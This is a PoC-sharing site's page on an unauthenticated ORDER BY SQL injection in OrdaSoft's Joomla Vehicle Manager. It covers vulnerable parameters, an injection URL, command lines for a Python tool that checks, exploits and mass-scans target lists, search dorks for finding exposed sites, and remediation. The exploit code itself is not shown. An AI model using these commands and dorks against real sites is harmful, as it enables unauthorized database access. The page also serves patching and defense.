POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Joomlacritical

CVE-2026-101108 — OrdaSoft Joomla Vehicle Manager (Free) Unauthenticated SQL Injection

September 29, 2026 · 48 views

OrdaSoft Vehicle Manager (Free) for Joomla ≤ 6.5.7: unauthenticated SQL injection (CWE-89) via order_field and order_direction concatenated into unquoted ORDER BY in site/vehiclemanager.php (com_vehiclemanager). Escaping is ineffective for sort keys. Public category, search, and all-vehicles views. Fixed in 6.5.8+. CVSS 4.0 9.3 Critical. Python PoC: check, error-based exploit, mass -j.

#joomla#ordasoft#sqli#sql-injection#cms#unauthenticated#vehiclemanager#com_vehiclemanager#cwe-89#critical

CVE:

CVE-2026-101108

Date:

2026-09-29

Severity:

CRITICAL

Exploit source

PoC code is available to registered members only.

Description

Overview

CVE-2026-101108 affects OrdaSoft Vehicle Manager (Free) for Joomla — extension ≤ 6.5.7. Fixed in 6.5.8+.

| | | |---|---| | Component | com_vehiclemanager | | File | site/vehiclemanager.php | | Parameters | order_field, order_direction → ORDER BY (unquoted) | | Auth | None (public category / search / all-vehicles views) | | CWE | CWE-89 SQL Injection | | CVSS 4.0 | 9.3 Critical (Joomla CNA) | | Credit | Ala Arfaoui (CNA) |

Why escaping fails: Input may pass through escapers meant for string literals, but ORDER BY sort keys are concatenated as SQL structure — not quoted strings. Attackers supply expressions (e.g. error-based subqueries) instead of column names. The CNA documents this escape bypass pattern for CVE-2026-101108.

Affected anonymous frontend entry points:

  1. Category listing (showCategory)
  2. Search (search / related tasks)
  3. All-vehicles listing (showVehicles and similar)

PoC page: https://pocbit.org/pocs/cve-2026-101108

GitHub: murrez/CVE-2026-101108

Bundled tool (Python 3)

Download poc.py from this page (View exploit code).

pip install -r requirements.txt

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt

| Mode | Behavior | |------|----------| | check | Fingerprint com_vehiclemanager, manifest version, catid / Itemid, SQLi proof; --aggressive tries SELECT VERSION() | | exploit | Error-based EXTRACTVALUE-style double query via ORDER BY | | Mass | --list + -j → hits.txt, exploited.txt |

Exploit vectors (first successful wins): order_field GET, order_direction GET (asc,<subquery>), order_field POST, order_direction POST. Force one with --vector.

Example HTTP surface

GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc

Search baseline (built by PoC):

GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all

Version detection

/administrator/components/com_vehiclemanager/vehiclemanager.xml

Version ≤ 6.5.7 → likely vulnerable. ≥ 6.5.8 → patched.

OrdaSoft batch context (Sep 2026)

Same disclosure window as Real Estate Manager (CVE-2026-100752 / CVE-2026-100753). Patch all OrdaSoft Joomla extensions you run.

| CVE | Product | Issue | Fixed | |-----|---------|-------|-------| | CVE-2026-101108 | Vehicle Manager (Free) | Unauth ORDER BY SQLi | 6.5.8 | | CVE-2026-100752 | Real Estate Manager | Unauth ORDER BY SQLi | 6.7.9 |

Hunting (examples)

body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"

Remediation

  1. Upgrade to Vehicle Manager 6.5.8+.
  2. Inventory other OrdaSoft components on the same Joomla site.
  3. Restrict or monitor com_vehiclemanager sort parameters until patched.

Legal and ethical use

Authorized security testing and patch validation only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →